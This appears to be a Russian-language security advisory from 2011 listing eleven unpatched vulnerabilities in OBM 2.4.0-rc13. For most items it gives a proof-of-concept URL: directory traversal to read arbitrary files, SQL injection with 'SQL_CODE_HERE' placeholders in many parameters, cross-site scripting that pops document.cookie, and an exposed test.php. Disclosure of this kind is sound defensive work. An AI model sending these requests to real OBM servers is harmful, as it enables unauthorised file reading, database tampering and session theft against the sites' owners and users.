Дата публикации: | 22.12.2011 |
Всего просмотров: | 1787 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 11 |
CVSSv2 рейтинг: | 6.8 (AV:N/AC:L/Au:S/C:C/I:N/A:N/E:P/RL:U/RC:C) 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:P/RL:U/RC:C) 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:P/RL:U/RC:C) 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:P/RL:U/RC:C) 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N/E:P/RL:U/RC:C) 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N/E:P/RL:U/RC:C) 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N/E:P/RL:U/RC:C) 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:P/RL:U/RC:C) 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:P/RL:U/RC:C) 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:P/RL:U/RC:C) 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N/E:P/RL:U/RC:C) |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Раскрытие системных данных Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | OBM 2.4.x |
Уязвимые версии: OBM 2.4.0-rc13, возможно другие версии.
Описание:
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "module" в сценарии exportcsv/exportcsv_index.php. Удаленный пользователь может с помощью специально сформированного запроса, содержащего символы обхода каталога, просмотреть содержимое произвольных файлов на системе. Пример:
http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "sel_domain_id" в сценарии obm.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
<form action="http://[host]/obm.php" method="post"> Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен. 3. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "lang" и "theme" в сценарии settings/settings_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://[host]/settings/settings_index.php?lang=%27%20SQL_CODE_HERE http://obm/settings/settings_index.php?theme=%27%20SQL_CODE_HERE Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен. 4. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tf_user" в сценарии group/group_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://[host]/group/group_index.php?action=search&popup=&sel_privacy=_ALL_&submit=Find&a mp;tf_user=%27%20SQL_CODE_HERE Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен. 5. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "tf_delegation", "tf_ip" и "tf_name" в сценарии host/host_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=%27%20SQL_CODE_HERE&tf_ip=&tf_name= http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=&tf_ip=%27%20SQL_CODE_HERE&tf_name= http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=&tf_ip=&tf_name=%27%20SQL_CODE_HERE Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен. 6. Уязвимость существует из-за недостаточной обработки входных данных в параметре "action" в сценарии obm.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://[host]/obm.php?action=%27%20SQL_CODE_HERE Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен. 7. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "cal_alert", "cal_first_hour", "cal_interval", "cal_last_hour", "commentorder", "csv_sep", "date", "date_upd", "debug_exe", "debug_id", "debug_param", "debug_sess", "debug_solr", "debug_sql", "dsrc", "menu", "rows", "sel_display_days", "timeformat", "timezone" и "todo" в сценарии settings/settings_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://[host]/settings/settings_index.php?cal_alert=%27%20SQL_CODE_HERE&cal_first_hour=0&cal _interval=4&cal_last_hour=1&commentorder=0&csv_sep=%3b&date=Y-m-d&date_upd=Y-m-d &debug_exe=16&debug_id=1&debug_param=2&debug_sess=4&debug_solr=32&debug_sql= 8&display=yes&dsrc=0&form_user_pref=1&mail=yes&mail_participation=yes&menu=t ext&public_fb=yes&rows=10&sel_display_days=1111111&submit=Validate&timeformat=12 H&timezone=Africa%2fAbidjan&todo=todo_priority Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен. 8. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "tf_delegation", "tf_ip" и "tf_name" в сценарии host/host_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=%22%20onmouseover=alert%28document.cookie%29;%22&tf_ip=&tf _name= http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=&tf_ip=%22%20onmouseover=alert%28document.cookie%29;%22&tf _name= http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=&tf_ip=&tf_name=%22%20onmouseover=alert%28document.cookie% 29;%22 9. Уязвимость существует из-за недостаточной обработки входных данных в параметре "login" в сценарии obm.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
<form action="http://[host]/obm.php" method="post"> 10. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tf_user" в сценарии group/group_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
http://[host]/group/group_index.php?action=search&popup=&sel_privacy=_ALL_&submit=Find&a mp;tf_user=%22%20onmouseover=alert%28document.cookie%29;%22 11. Уязвимость существует из-за небезопасного сохранения сценария test.php. Удаленный пользователь может получить доступ к важной информации вызывая файл напрямую. Пример:
http://[host]/test.php URL производителя: http://obm.org/doku.php Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_obm.html |